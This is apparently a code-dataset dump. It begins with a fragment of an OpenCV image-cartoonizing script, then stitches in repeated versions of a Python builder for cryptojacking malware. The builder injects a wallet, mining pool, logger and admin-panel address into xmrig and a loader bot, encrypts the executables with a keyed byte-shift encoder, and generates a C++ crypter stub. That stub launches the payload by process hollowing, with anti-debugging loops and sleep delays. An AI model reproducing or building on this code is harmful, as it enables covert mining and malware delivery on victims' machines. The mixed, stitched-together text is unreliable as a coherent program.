"step-4": "<mask token>\nimport cv2\nimport numpy as np\nnum_down = 2\nnum_bilateral = 50\nimg_rgb = cv2.imread('stunning-latest-pics-of-Kajal-Agarwal.jpg')\nimg_rgb = cv2.resize(img_rgb, (800, 800))\nimg_color = img_rgb\nfor _ in range(num_down):\n img_color = cv2.pyrDown(img_color)\nfor _ in range(num_bilateral):\n img_color = cv2.bilateralFilter(img_color, d=9, sigmaColor=9, sigmaSpace=7)\nfor _ in range(num_down):\n img_color = cv2.pyrUp(img_color)\nimg_gray = cv2.cvtColor(img_rgb, cv2.COLOR_RGB2GRAY)\nimg_blur = cv2.medianBlur(img_gray, 7)\nimg_edge = cv2.adaptiveThreshold(img_blur, 255, cv2.ADAPTIVE_THRESH_MEAN_C,\n cv2.THRESH_BINARY, blockSize=9, C=2)\nimg_edge = cv2.cvtColor(img_edge, cv2.COLOR_GRAY2RGB)\nimg_sketch = cv2.bitwise_and(img_color, img_edge)\nstack = np.hstack([img_rgb, img_sketch])\ncv2.imwrite('cartoon1.jpg', stack)\n",
"step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 3 18:45:08 2020\r\n\r\n@author: Neeraj\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nnum_down=2\r\nnum_bilateral=50\r\n\r\nimg_rgb=cv2.imread(\"stunning-latest-pics-of-Kajal-Agarwal.jpg\") #image path\r\nimg_rgb=cv2.resize(img_rgb,(800,800))\r\n\r\nimg_color=img_rgb\r\n\r\nfor _ in range(num_down):\r\n img_color=cv2.pyrDown(img_color)\r\n \r\nfor _ in range(num_bilateral):\r\n img_color=cv2.bilateralFilter(img_color,d=9,\r\n sigmaColor=9,\r\n sigmaSpace=7)\r\n\r\n\r\nfor _ in range(num_down):\r\n img_color=cv2.pyrUp(img_color)\r\n \r\nimg_gray=cv2.cvtColor(img_rgb,cv2.COLOR_RGB2GRAY)\r\nimg_blur=cv2.medianBlur(img_gray,7)\r\n\r\nimg_edge=cv2.adaptiveThreshold(img_blur,255,\r\n cv2.ADAPTIVE_THRESH_MEAN_C,\r\n cv2.THRESH_BINARY,\r\n blockSize=9,\r\n C=2)\r\nimg_edge=cv2.cvtColor(img_edge,cv2.COLOR_GRAY2RGB)\r\nimg_sketch=cv2.bitwise_and(img_color,img_edge)\r\n\r\n#displaying the actual and sketched images\r\n\r\nstack=np.hstack([img_rgb,img_sketch])\r\n# cv2.imshow(\"stacked\",stack)\r\n# cv2.waitKey(0)\r\n\r\ncv2.imwrite(\"cartoon1.jpg\",stack) #to save the image\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def load_userdata(wallet, pool, ww, logger, adminka):
with open('D:\\msys64\\xmrig-master\\src\\ex.cpp', 'r') as f:
file = f.read()
file = file.replace('%u%', wallet)
file = file.replace('%p%', pool)
file = file.replace('%w%', ww)
with open('D:\\msys64\\xmrig-master\\src\\xmrig.cpp', 'w') as w:
w.write(file)
with open(os.getcwd() + '\\Bot\\Miner\\ex.cs', 'r') as f:
file = f.read()
file = file.replace('%l%', logger)
file = file.replace('%a%', adminka)
with open(os.getcwd() + '\\Bot\\Miner\\Program.cs', 'w') as w:
w.write(file)
def writeBytes(key):
with open(os.getcwd() + '\\file.txt', 'r') as f:
file = f.read()
with open(os.getcwd() + '\\Miner\\CryptRunPe\\winhost.cpp', 'w') as w:
w.write(
"""#include <stdafx.h>
#include "process.h"
#include "memrun.h"
using namespace std;
"""
)
with open('ex.txt') as ex:
w.write(file)
exx = ex.read()
w.write(exx)
def compile(path, file):
os.system(
'%windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe "' +
path + file + '.sln" /p:Configuration=Release')
def compileM(path, file):
os.system('msbuild.exe "' + path + file + '.sln" /p:Configuration=Release')
def compileR(path, file):
os.system('msbuild.exe "' + path + file +
'.sln" /p:Configuration=Release /p:Platform="WIN32"')
def xcopy(path, out):
try:
with open(path, 'rb') as f:
file = f.read()
with open(out, 'wb') as w:
w.write(bytearray(file))
except:
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def load_userdata(wallet, pool, ww, logger, adminka):
with open('D:\\msys64\\xmrig-master\\src\\ex.cpp', 'r') as f:
file = f.read()
file = file.replace('%u%', wallet)
file = file.replace('%p%', pool)
file = file.replace('%w%', ww)
with open('D:\\msys64\\xmrig-master\\src\\xmrig.cpp', 'w') as w:
w.write(file)
with open(os.getcwd() + '\\Bot\\Miner\\ex.cs', 'r') as f:
file = f.read()
file = file.replace('%l%', logger)
file = file.replace('%a%', adminka)
with open(os.getcwd() + '\\Bot\\Miner\\Program.cs', 'w') as w:
w.write(file)
def writeBytes(key):
with open(os.getcwd() + '\\file.txt', 'r') as f:
file = f.read()
with open(os.getcwd() + '\\Miner\\CryptRunPe\\winhost.cpp', 'w') as w:
w.write(
"""#include <stdafx.h>
#include "process.h"
#include "memrun.h"
using namespace std;
"""
)
with open('ex.txt') as ex:
w.write(file)
exx = ex.read()
w.write(exx)
def compile(path, file):
os.system(
'%windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe "' +
path + file + '.sln" /p:Configuration=Release')
def compileM(path, file):
os.system('msbuild.exe "' + path + file + '.sln" /p:Configuration=Release')
def compileR(path, file):
os.system('msbuild.exe "' + path + file +
'.sln" /p:Configuration=Release /p:Platform="WIN32"')
def xcopy(path, out):
try:
with open(path, 'rb') as f:
file = f.read()
with open(out, 'wb') as w:
w.write(bytearray(file))
except:
pass
def crypt(name, key):
with open('encoder.cpp', 'w') as w:
txt = """
#include <Windows.h>
#include <winternl.h>
#include <iostream>
#include <string>
#include <fstream>
using namespace std;
int main()
{
FILE * file = fopen("in.exe", "rb");
if (file == NULL) return 0;
fseek(file, 0, SEEK_END);
long int size = ftell(file);
fclose(file);
file = fopen("in.exe", "rb");
unsigned char * in = (unsigned char *)malloc(size);
int bytes_read = fread(in, sizeof(unsigned char), size, file);
fclose(file);
for (int i = 0; i < size; i++) {
in[i] = in[i] - 0x0%n%;
}
file = fopen("out.exe", "wb");
int bytes_written = fwrite(in, sizeof(unsigned char), size, file);
fclose(file);
for (int i = 0; i < size; i++) {
in[i] = in[i] + 0x0%n%;
}
file = fopen("decr.exe", "wb");
bytes_written = fwrite(in, sizeof(unsigned char), size, file);
fclose(file);
return 0;
}
"""
txt = txt.replace('%n%', str(key))
w.write(txt)
os.system('g++ -o enc encoder.cpp')
os.system('C:\\Python27\\python.exe cv.py')
with open('file.txt', 'r') as r:
with open(os.getcwd() + '\\src\\crypter\\crypter.cpp', 'w') as w:
txt = """ #include "stdafx.h"
#include "Crypter.h"
#include <windows.h>
#include <winternl.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"ntdll.lib")
""" + r.read() + """ int RunPortableExecutable(void* Image) {
IMAGE_DOS_HEADER* DOSHeader;
IMAGE_NT_HEADERS* NtHeader;
IMAGE_SECTION_HEADER* SectionHeader;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
CONTEXT* CTX;
DWORD* ImageBase;
void* pImageBase;
int count;
char buffer[MAX_PATH];
GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);
char *CurrentFilePath = buffer;
DOSHeader = PIMAGE_DOS_HEADER(Image);
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {
ZeroMemory(&PI, sizeof(PI));
ZeroMemory(&SI, sizeof(SI));
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
NtUnmapViewOfSection mNtUnmapViewOfSection;
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {
CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL;
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
}
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
ResumeThread(PI.hThread);
return 0;
}
}
}
}
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {
for (int i = 0; i < 550000; i++)
OutputDebugStringW(L"");
for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {
unsigned char b = rawData[i] + 0x0%n%;
rawData[i] = b;
}
Sleep(((rand() % 5 + 1) + 5) * 1000);
RunPortableExecutable(rawData);
return 0;
} """
txt = txt.replace('%n%', str(key))
w.write(txt)
compileM(os.getcwd() + '\\src\\', 'ConsoleApplication1')
xcopy(os.getcwd() + '\\src\\Release\\Crypter.exe', os.getcwd() +
'\\' + name + '.exe')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def load_userdata(wallet, pool, ww, logger, adminka):
with open('D:\\msys64\\xmrig-master\\src\\ex.cpp', 'r') as f:
file = f.read()
file = file.replace('%u%', wallet)
file = file.replace('%p%', pool)
file = file.replace('%w%', ww)
with open('D:\\msys64\\xmrig-master\\src\\xmrig.cpp', 'w') as w:
w.write(file)
with open(os.getcwd() + '\\Bot\\Miner\\ex.cs', 'r') as f:
file = f.read()
file = file.replace('%l%', logger)
file = file.replace('%a%', adminka)
with open(os.getcwd() + '\\Bot\\Miner\\Program.cs', 'w') as w:
w.write(file)
def writeBytes(key):
with open(os.getcwd() + '\\file.txt', 'r') as f:
file = f.read()
with open(os.getcwd() + '\\Miner\\CryptRunPe\\winhost.cpp', 'w') as w:
w.write(
"""#include <stdafx.h>
#include "process.h"
#include "memrun.h"
using namespace std;
"""
)
with open('ex.txt') as ex:
w.write(file)
exx = ex.read()
w.write(exx)
def compile(path, file):
os.system(
'%windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe "' +
path + file + '.sln" /p:Configuration=Release')
def compileM(path, file):
os.system('msbuild.exe "' + path + file + '.sln" /p:Configuration=Release')
def compileR(path, file):
os.system('msbuild.exe "' + path + file +
'.sln" /p:Configuration=Release /p:Platform="WIN32"')
def xcopy(path, out):
try:
with open(path, 'rb') as f:
file = f.read()
with open(out, 'wb') as w:
w.write(bytearray(file))
except:
pass
def crypt(name, key):
with open('encoder.cpp', 'w') as w:
txt = """
#include <Windows.h>
#include <winternl.h>
#include <iostream>
#include <string>
#include <fstream>
using namespace std;
int main()
{
FILE * file = fopen("in.exe", "rb");
if (file == NULL) return 0;
fseek(file, 0, SEEK_END);
long int size = ftell(file);
fclose(file);
file = fopen("in.exe", "rb");
unsigned char * in = (unsigned char *)malloc(size);
int bytes_read = fread(in, sizeof(unsigned char), size, file);
fclose(file);
for (int i = 0; i < size; i++) {
in[i] = in[i] - 0x0%n%;
}
file = fopen("out.exe", "wb");
int bytes_written = fwrite(in, sizeof(unsigned char), size, file);
fclose(file);
for (int i = 0; i < size; i++) {
in[i] = in[i] + 0x0%n%;
}
file = fopen("decr.exe", "wb");
bytes_written = fwrite(in, sizeof(unsigned char), size, file);
fclose(file);
return 0;
}
"""
txt = txt.replace('%n%', str(key))
w.write(txt)
os.system('g++ -o enc encoder.cpp')
os.system('C:\\Python27\\python.exe cv.py')
with open('file.txt', 'r') as r:
with open(os.getcwd() + '\\src\\crypter\\crypter.cpp', 'w') as w:
txt = """ #include "stdafx.h"
#include "Crypter.h"
#include <windows.h>
#include <winternl.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"ntdll.lib")
""" + r.read() + """ int RunPortableExecutable(void* Image) {
IMAGE_DOS_HEADER* DOSHeader;
IMAGE_NT_HEADERS* NtHeader;
IMAGE_SECTION_HEADER* SectionHeader;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
CONTEXT* CTX;
DWORD* ImageBase;
void* pImageBase;
int count;
char buffer[MAX_PATH];
GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);
char *CurrentFilePath = buffer;
DOSHeader = PIMAGE_DOS_HEADER(Image);
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {
ZeroMemory(&PI, sizeof(PI));
ZeroMemory(&SI, sizeof(SI));
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
NtUnmapViewOfSection mNtUnmapViewOfSection;
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {
CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL;
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
}
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
ResumeThread(PI.hThread);
return 0;
}
}
}
}
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {
for (int i = 0; i < 550000; i++)
OutputDebugStringW(L"");
for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {
unsigned char b = rawData[i] + 0x0%n%;
rawData[i] = b;
}
Sleep(((rand() % 5 + 1) + 5) * 1000);
RunPortableExecutable(rawData);
return 0;
} """
txt = txt.replace('%n%', str(key))
w.write(txt)
compileM(os.getcwd() + '\\src\\', 'ConsoleApplication1')
xcopy(os.getcwd() + '\\src\\Release\\Crypter.exe', os.getcwd() +
'\\' + name + '.exe')
<|reserved_special_token_0|>
load_userdata(u, p, w, l, a)
compile(os.getcwd() + '\\Bot\\', 'LoaderBot')
xcopy(os.getcwd() + '\\Bot\\Miner\\bin\\Release\\LoaderBot.exe', 'Bot.exe')
compileR(os.getcwd() + '\\rig\\', 'xmrig')
xcopy(os.getcwd() + '\\rig\\Release\\xmrig.exe', 'out.exe')
crypt('test', key)
os.system('C:\\Python27\\python.exe cv.py')
writeBytes(key)
compileM(os.getcwd() + '\\Miner\\', 'winhost')
xcopy(os.getcwd() + '\\Miner\\Release\\winhost.exe', 'in.exe')
print(os.getcwd() + '\\enc.exe')
subprocess.call(os.getcwd() + '\\enc.exe')
crypt('winhost', key)
os.system('del file.txt')
os.system('del in.exe')
os.system('del out.exe')
os.system('del decr.exe')
os.system('del enc.exe')
os.system('del test.exe')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def load_userdata(wallet, pool, ww, logger, adminka):
with open('D:\\msys64\\xmrig-master\\src\\ex.cpp', 'r') as f:
file = f.read()
file = file.replace('%u%', wallet)
file = file.replace('%p%', pool)
file = file.replace('%w%', ww)
with open('D:\\msys64\\xmrig-master\\src\\xmrig.cpp', 'w') as w:
w.write(file)
with open(os.getcwd() + '\\Bot\\Miner\\ex.cs', 'r') as f:
file = f.read()
file = file.replace('%l%', logger)
file = file.replace('%a%', adminka)
with open(os.getcwd() + '\\Bot\\Miner\\Program.cs', 'w') as w:
w.write(file)
def writeBytes(key):
with open(os.getcwd() + '\\file.txt', 'r') as f:
file = f.read()
with open(os.getcwd() + '\\Miner\\CryptRunPe\\winhost.cpp', 'w') as w:
w.write(
"""#include <stdafx.h>
#include "process.h"
#include "memrun.h"
using namespace std;
"""
)
with open('ex.txt') as ex:
w.write(file)
exx = ex.read()
w.write(exx)
def compile(path, file):
os.system(
'%windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe "' +
path + file + '.sln" /p:Configuration=Release')
def compileM(path, file):
os.system('msbuild.exe "' + path + file + '.sln" /p:Configuration=Release')
def compileR(path, file):
os.system('msbuild.exe "' + path + file +
'.sln" /p:Configuration=Release /p:Platform="WIN32"')
def xcopy(path, out):
try:
with open(path, 'rb') as f:
file = f.read()
with open(out, 'wb') as w:
w.write(bytearray(file))
except:
pass
def crypt(name, key):
with open('encoder.cpp', 'w') as w:
txt = """
#include <Windows.h>
#include <winternl.h>
#include <iostream>
#include <string>
#include <fstream>
using namespace std;
int main()
{
FILE * file = fopen("in.exe", "rb");
if (file == NULL) return 0;
fseek(file, 0, SEEK_END);
long int size = ftell(file);
fclose(file);
file = fopen("in.exe", "rb");
unsigned char * in = (unsigned char *)malloc(size);
int bytes_read = fread(in, sizeof(unsigned char), size, file);
fclose(file);
for (int i = 0; i < size; i++) {
in[i] = in[i] - 0x0%n%;
}
file = fopen("out.exe", "wb");
int bytes_written = fwrite(in, sizeof(unsigned char), size, file);
fclose(file);
for (int i = 0; i < size; i++) {
in[i] = in[i] + 0x0%n%;
}
file = fopen("decr.exe", "wb");
bytes_written = fwrite(in, sizeof(unsigned char), size, file);
fclose(file);
return 0;
}
"""
txt = txt.replace('%n%', str(key))
w.write(txt)
os.system('g++ -o enc encoder.cpp')
os.system('C:\\Python27\\python.exe cv.py')
with open('file.txt', 'r') as r:
with open(os.getcwd() + '\\src\\crypter\\crypter.cpp', 'w') as w:
txt = """ #include "stdafx.h"
#include "Crypter.h"
#include <windows.h>
#include <winternl.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"ntdll.lib")
""" + r.read() + """ int RunPortableExecutable(void* Image) {
IMAGE_DOS_HEADER* DOSHeader;
IMAGE_NT_HEADERS* NtHeader;
IMAGE_SECTION_HEADER* SectionHeader;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
CONTEXT* CTX;
DWORD* ImageBase;
void* pImageBase;
int count;
char buffer[MAX_PATH];
GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);
char *CurrentFilePath = buffer;
DOSHeader = PIMAGE_DOS_HEADER(Image);
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {
ZeroMemory(&PI, sizeof(PI));
ZeroMemory(&SI, sizeof(SI));
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
NtUnmapViewOfSection mNtUnmapViewOfSection;
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {
CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL;
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
}
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
ResumeThread(PI.hThread);
return 0;
}
}
}
}
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {
for (int i = 0; i < 550000; i++)
OutputDebugStringW(L"");
for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {
unsigned char b = rawData[i] + 0x0%n%;
rawData[i] = b;
}
Sleep(((rand() % 5 + 1) + 5) * 1000);
RunPortableExecutable(rawData);
return 0;
} """
txt = txt.replace('%n%', str(key))
w.write(txt)
compileM(os.getcwd() + '\\src\\', 'ConsoleApplication1')
xcopy(os.getcwd() + '\\src\\Release\\Crypter.exe', os.getcwd() +
'\\' + name + '.exe')
key = random.randint(1, 100)
u = sys.argv[1]
w = sys.argv[2]
p = sys.argv[3]
l = sys.argv[4]
a = sys.argv[5]
load_userdata(u, p, w, l, a)
compile(os.getcwd() + '\\Bot\\', 'LoaderBot')
xcopy(os.getcwd() + '\\Bot\\Miner\\bin\\Release\\LoaderBot.exe', 'Bot.exe')
compileR(os.getcwd() + '\\rig\\', 'xmrig')
xcopy(os.getcwd() + '\\rig\\Release\\xmrig.exe', 'out.exe')
crypt('test', key)
os.system('C:\\Python27\\python.exe cv.py')
writeBytes(key)
compileM(os.getcwd() + '\\Miner\\', 'winhost')
xcopy(os.getcwd() + '\\Miner\\Release\\winhost.exe', 'in.exe')
print(os.getcwd() + '\\enc.exe')
subprocess.call(os.getcwd() + '\\enc.exe')
crypt('winhost', key)
os.system('del file.txt')
os.system('del in.exe')
os.system('del out.exe')
os.system('del decr.exe')
os.system('del enc.exe')
os.system('del test.exe')
<|reserved_special_token_1|>
import os, sys, time, random, subprocess
def load_userdata(wallet, pool, ww, logger, adminka):
with open("D:\\msys64\\xmrig-master\\src\\ex.cpp", "r") as f:
file = f.read()
file = file.replace("%u%", wallet)
file = file.replace("%p%", pool)
file = file.replace("%w%", ww)
with open("D:\\msys64\\xmrig-master\\src\\xmrig.cpp", "w") as w:
w.write(file)
with open(os.getcwd()+"\\Bot\\Miner\\ex.cs", "r") as f:
file = f.read()
file = file.replace("%l%", logger)
file = file.replace("%a%", adminka)
with open(os.getcwd()+"\\Bot\\Miner\\Program.cs", "w") as w:
w.write(file)
def writeBytes(key):
with open(os.getcwd()+"\\file.txt", "r") as f:
file = f.read()
with open(os.getcwd()+"\\Miner\\CryptRunPe\\winhost.cpp", "w") as w:
w.write("#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n")
with open("ex.txt") as ex:
w.write(file)
exx = ex.read()
w.write(exx)
def compile(path, file):
os.system("%windir%\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe \""+path+file+".sln\" /p:Configuration=Release")
def compileM(path, file):
os.system("msbuild.exe \""+path+file+".sln\" /p:Configuration=Release")
def compileR(path, file):
os.system("msbuild.exe \""+path+file+".sln\" /p:Configuration=Release /p:Platform=\"WIN32\"")
def xcopy(path, out):
try:
with open(path, "rb") as f:
file = f.read()
with open(out, "wb") as w:
w.write(bytearray(file))
except:
pass
def crypt(name, key):
with open('encoder.cpp', 'w') as w:
txt = '\n\
#include <Windows.h>\n\
#include <winternl.h>\n\
#include <iostream>\n\
#include <string>\n\
#include <fstream>\n\
using namespace std;\n\
int main()\n\
{\n\
FILE * file = fopen("in.exe", "rb");\n\
if (file == NULL) return 0;\n\
fseek(file, 0, SEEK_END);\n\
long int size = ftell(file);\n\
fclose(file);\n\
file = fopen("in.exe", "rb");\n\
unsigned char * in = (unsigned char *)malloc(size);\n\
int bytes_read = fread(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
for (int i = 0; i < size; i++) {\n\
in[i] = in[i] - 0x0%n%;\n\
}\n\
file = fopen("out.exe", "wb");\n\
int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
for (int i = 0; i < size; i++) {\n\
in[i] = in[i] + 0x0%n%;\n\
}\n\
file = fopen("decr.exe", "wb");\n\
bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
return 0;\n\
}\n\
'
txt = txt.replace("%n%", str(key))
w.write(txt)
os.system("g++ -o enc encoder.cpp")
os.system("C:\Python27\python.exe cv.py")
with open('file.txt', 'r') as r:
with open(os.getcwd()+"\\src\\crypter\\crypter.cpp", "w") as w:
txt = '\
#include "stdafx.h"\n\
#include "Crypter.h"\n\
#include <windows.h>\n\
#include <winternl.h>\n\
#pragma comment(lib,"ws2_32.lib")\n\
#pragma comment(lib,"ntdll.lib")\n\
'+ r.read() + '\
int RunPortableExecutable(void* Image) {\n\
IMAGE_DOS_HEADER* DOSHeader;\n\
IMAGE_NT_HEADERS* NtHeader;\n\
IMAGE_SECTION_HEADER* SectionHeader;\n\
PROCESS_INFORMATION PI;\n\
STARTUPINFOA SI;\n\
CONTEXT* CTX;\n\
DWORD* ImageBase;\n\
void* pImageBase;\n\
int count;\n\
char buffer[MAX_PATH];\n\
GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n\
char *CurrentFilePath = buffer;\n\
DOSHeader = PIMAGE_DOS_HEADER(Image);\n\
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n\
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n\
ZeroMemory(&PI, sizeof(PI));\n\
ZeroMemory(&SI, sizeof(SI));\n\
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n\
NtUnmapViewOfSection mNtUnmapViewOfSection;\n\
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n\
CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n\
CTX->ContextFlags = CONTEXT_FULL;\n\
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n\
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n\
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n\
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n\
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n\
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n\
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n\
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n\
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n\
}\n\
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n\
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n\
SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n\
ResumeThread(PI.hThread);\n\
return 0;\n\
}\n\
}\n\
}\n\
}\n\
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n\
for (int i = 0; i < 550000; i++)\n\
OutputDebugStringW(L"");\n\
for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n\
unsigned char b = rawData[i] + 0x0%n%;\n\
rawData[i] = b;\n\
}\n\
Sleep(((rand() % 5 + 1) + 5) * 1000);\n\
RunPortableExecutable(rawData);\n\
return 0;\n\
}\
'
txt = txt.replace("%n%", str(key))
w.write(txt)
compileM(os.getcwd()+"\\src\\", "ConsoleApplication1")
xcopy(os.getcwd() + "\\src\\Release\\Crypter.exe", os.getcwd()+"\\"+name+".exe")
key = random.randint(1, 100)
u = sys.argv[1]
w = sys.argv[2]
p = sys.argv[3]
l = sys.argv[4]
